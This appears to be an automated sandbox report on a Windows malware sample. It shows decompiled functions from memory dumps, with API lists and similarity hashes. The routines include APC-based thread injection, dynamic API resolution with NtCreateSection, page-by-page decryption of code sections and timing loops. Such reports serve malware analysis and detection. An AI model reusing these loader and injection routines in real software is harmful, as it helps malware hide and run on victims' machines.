Function 00A74430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00A74430(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa7a290 = _t14;
				if(_t14 != 0) {
					 *0xa7a180 = GetTickCount();
					_t16 = E00A72A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00A780B2();
						_t40 = _t18 + _t20;
						_t22 = E00A73F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xa7a2ac; // 0x2d4
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xa7a2b8 = 1; // executed
						}
					}
					_t16 = E00A72D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00a74430
0x00a74445
0x00a7444d
0x00a74452
0x00a74465
0x00a7446a
0x00a74471
0x00a744f9
0x00a744ff
0x00000000
0x00000000
0x00000000
0x00a74477
0x00a74477
0x00a7447c
0x00a74482
0x00a74488
0x00a74492
0x00a74496
0x00a74497
0x00a7449c
0x00a7449d
0x00a7449e
0x00a744a3
0x00a744a9
0x00a744b2
0x00a744b8
0x00a744be
0x00a744c3
0x00a744ca
0x00a744ce
0x00a744d6
0x00a744de
0x00a744e0
0x00a744e0
0x00a744e8
0x00a744ea
0x00a744ea
0x00a744e8
0x00a744f4
0x00000000
0x00a744f4
0x00a74456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A74445
GetTickCount.KERNEL32 ref: 00A7445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00A7447C
SwitchToThread.KERNEL32(?,00000001), ref: 00A74482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00A7449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00A744B8
IsWow64Process.KERNEL32(000002D4,?,?,00000001), ref: 00A744D6

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: dd297e83bb48b427d6e9e2349088cfabbe6bf3627b332c56f020d43b2d666f3f
Instruction ID: a9cab89c758ec9178df0407c67f226f70290fcfe51ae011fe67d23bc9cfd3e7e
Opcode Fuzzy Hash: dd297e83bb48b427d6e9e2349088cfabbe6bf3627b332c56f020d43b2d666f3f
Instruction Fuzzy Hash: 0221A2B2A04204AFDB10EFA4DC89B6F77E8BB48350F00C92AF55DC2151E7349886DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A75AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A75AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xa7a2d0; // 0x4aed5a8
				_t1 = _t9 + 0xa7b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00A747BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5569631
					_t40 = E00A75C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00A71AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00A72A03(_t40);
						_t42 = E00A7332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00A72A03(_t36);
							_t36 = _t42;
						}
						_t43 = E00A74138(_t36, _t33);
						if(_t43 != 0) {
							E00A72A03(_t36);
							_t36 = _t43;
						}
					}
					E00A72A03(_t28);
				}
				return _t36;
			}

0x00a75ae3
0x00a75ae6
0x00a75ae7
0x00a75aee
0x00a75af5
0x00a75afc
0x00a75b00
0x00a75b07
0x00a75b0e
0x00a75b13
0x00a75b1b
0x00a75b25
0x00a75b29
0x00a75b2d
0x00a75b33
0x00a75b38
0x00a75b42
0x00a75b48
0x00a75b4a
0x00a75b61
0x00a75b65
0x00a75b68
0x00a75b6d
0x00a75b6d
0x00a75b76
0x00a75b7a
0x00a75b7d
0x00a75b82
0x00a75b82
0x00a75b7a
0x00a75b85
0x00a75b8a
0x00a75b90

APIs

Part of subcall function 00A747BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A75AFC,253D7325,00000000,00000000,?,00000000,00A76301), ref: 00A74821
Part of subcall function 00A747BA: sprintf.NTDLL ref: 00A74842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

strcpy.NTDLL ref: 00A75B2D
lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38

Part of subcall function 00A71AF1: lstrlen.KERNEL32(00000000,00000000,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A71B02

Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55

Part of subcall function 00A7332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00A75B61,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A73339
Part of subcall function 00A7332F: _snprintf.NTDLL ref: 00A73397

Strings

=, xrefs: 00A75B4F

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: e411e5bb24e99542436fb92c6ab54363107de6f7fd9fa6da2ff95909183ed71b
Instruction ID: cd4f3374db9fa50f4af5ac5d588f5e6b7b079cde2bb89cb8045c72a812cc5190
Opcode Fuzzy Hash: e411e5bb24e99542436fb92c6ab54363107de6f7fd9fa6da2ff95909183ed71b
Instruction Fuzzy Hash: E1119133D016257B4622B7B89D85CAE369D9E857A0709C115F50C9B102EFB4DD0257E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A71671, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00A716B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00A71734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00A71773
SysFreeString.OLEAUT32(00000000), ref: 00A71795

Part of subcall function 00A713B4: SysAllocString.OLEAUT32(00A792D0), ref: 00A71404

SafeArrayDestroy.OLEAUT32(?), ref: 00A717E9
SysFreeString.OLEAUT32(?), ref: 00A717F7

Part of subcall function 00A75872: Sleep.KERNELBASE(000001F4), ref: 00A758BA

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: e98e8824a8e7fcb1a6f9d990701145e480fd54d1709c02d83e7d30914b55aecc
Instruction ID: 8a3c2f6617a5baa9d46d1b1fba325848c6045386ec49ae329d87b5a7e3331c51
Opcode Fuzzy Hash: e98e8824a8e7fcb1a6f9d990701145e480fd54d1709c02d83e7d30914b55aecc
Instruction Fuzzy Hash: 7351FB76900209AFDB14DFE8CC848AEB7B6FF88350B15C869E549EB220D7719D46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E051AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E051C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e0541d0 + 0x6e055014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E05136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e05512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E0518D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6E051C8F: HeapAlloc.KERNEL32(00000000,?,6E05117D,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43

Part of subcall function 6E0518D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
Part of subcall function 6E0518D1: memset.NTDLL ref: 6E051950

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
Instruction ID: 27570ec3e8125e34ab7f3adaa770dbf98e78e527a34629217c6a048ebf51dea6
Opcode Fuzzy Hash: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
Instruction Fuzzy Hash: 312174B5500B0AAFEB50DFA9CA90F5B7BECFF46284B004425E845D7351E734E925CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E051E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e054188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e05418c;
						if( *0x6e05418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e054198;
								if( *0x6e054198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e05418c);
						}
						HeapDestroy( *0x6e054190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e054188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e054190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e0541b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E051CA4(E6E051D32, E6E051EE0(_a12, 1, 0x6e054198, _t41));
							 *0x6e05418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6E054188), ref: 6E051E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E051E3B

Part of subcall function 6E051CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
Part of subcall function 6E051CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
Part of subcall function 6E051CA4: GetLastError.KERNEL32(00000000), ref: 6E051CDB
Part of subcall function 6E051CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
Part of subcall function 6E051CA4: CloseHandle.KERNEL32(00000000), ref: 6E051CEC
Part of subcall function 6E051CA4: SetLastError.KERNEL32(00000000), ref: 6E051CF5

InterlockedDecrement.KERNEL32(6E054188), ref: 6E051E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6E051EA8
CloseHandle.KERNEL32 ref: 6E051EC4
HeapDestroy.KERNEL32 ref: 6E051ED0

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
Instruction ID: 6dc3f6860c878178266abd800aee5e8ef9d0146646279f67a536916a6bf74d57
Opcode Fuzzy Hash: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
Instruction Fuzzy Hash: 65214F71A00B05FBCB409FE9DA98B8A7BE8FB5A2A47200529F516D3248E7348925CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E051CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0541cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e051cbb
0x6e051cc1
0x6e051cc5
0x6e051cd0
0x6e051cd8
0x6e051ce1
0x6e051ce5
0x6e051cec
0x6e051cf3
0x6e051cf5
0x6e051cfb
0x6e051cd8
0x6e051cff

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
GetLastError.KERNEL32(00000000), ref: 6E051CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
CloseHandle.KERNEL32(00000000), ref: 6E051CEC
SetLastError.KERNEL32(00000000), ref: 6E051CF5

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
Instruction ID: 9296a742ad03ee691f7f910d3cd9013dbedaeb9851969717e081b4de30d78abb
Opcode Fuzzy Hash: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
Instruction Fuzzy Hash: 7CF01237205F21BBDB125FE08E5CF5F7F69FB0E751F005404F60591155C72988259B95

Uniqueness

Uniqueness Score: -1.00%

Function 00A7344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00A734A3
SysAllocString.OLEAUT32(00A720DE), ref: 00A734E6
SysFreeString.OLEAUT32(00000000), ref: 00A734FA
SysFreeString.OLEAUT32(00000000), ref: 00A73508

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 617a9e885011238092397b4ba934a345f2053325cd8b9af003000d72447786db
Instruction ID: 904cb61850ccab4ee7af071aa3aaafa28629158dc19d4650cad58b9dbd9e4270
Opcode Fuzzy Hash: 617a9e885011238092397b4ba934a345f2053325cd8b9af003000d72447786db
Instruction Fuzzy Hash: C7312DB2910109EF8B05DF98DCC48AE7BB9FF58300B21C02EE50A97210E7359A86DF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E0515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E0515A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e0541b0;
				_t39 = E6E051A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e0541cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e055137; // 0x6e055137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E051D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e0541cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6

Strings

Mar 26 2021, xrefs: 6E05162B

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
Instruction ID: 0eeda2cde74c3d93092f81f949df5e8edfda03726d14f05a58b26e6fa8368cfd
Opcode Fuzzy Hash: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
Instruction Fuzzy Hash: 31315E71E0060AAFDB01CFD9CA80BDEBBB9FF49304F148129D505A7345D771AA1A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00A75988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A75988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00A75C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00a75994
0x00a75998
0x00a75999
0x00a7599a
0x00a7599c
0x00a7599e
0x00a759a3
0x00a759a6
0x00a75a3d
0x00a75a44
0x00a75a44
0x00a759af
0x00a759b6
0x00a759c6
0x00a759c6
0x00a759cc
0x00a759ce
0x00a759d3
0x00a759dc
0x00a759e4
0x00a759e7
0x00a759f2
0x00a759f6
0x00a759f8
0x00a759f9
0x00a75a02
0x00a75a06
0x00a75a17
0x00a75a08
0x00a75a0d
0x00a75a12
0x00a75a21
0x00a75a21
0x00a759f6
0x00a75a27
0x00a75a2d
0x00a75a2d
0x00a75a36
0x00a75a3b
0x00a75a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00A759B6
lstrlenW.KERNEL32(?), ref: 00A759EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00A75A0D
SysFreeString.OLEAUT32(?), ref: 00A75A21

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 1f93be9c2dffba11a72b64e1b680592e455c4cc942dfeedd9b326e553e34f5b2
Instruction ID: b0f8762ce86bf14244ca926536232be0aec5bc5b4da952244e6a245cbf4d89d2
Opcode Fuzzy Hash: 1f93be9c2dffba11a72b64e1b680592e455c4cc942dfeedd9b326e553e34f5b2
Instruction Fuzzy Hash: 22213975E00609EFCB11DFA8CD8899EBBB8FF49345B10C2A9E949E7210E7709A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E051D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E051D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E0517A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e051d3b
0x6e051d40
0x6e051d4e
0x6e051d53
0x6e051d53
0x6e051d59
0x6e051d5e
0x6e051d62
0x6e051d66
0x6e051d66
0x6e051d70
0x6e051d79

APIs

GetCurrentThread.KERNEL32 ref: 6E051D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E051D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E051D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E051D66

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
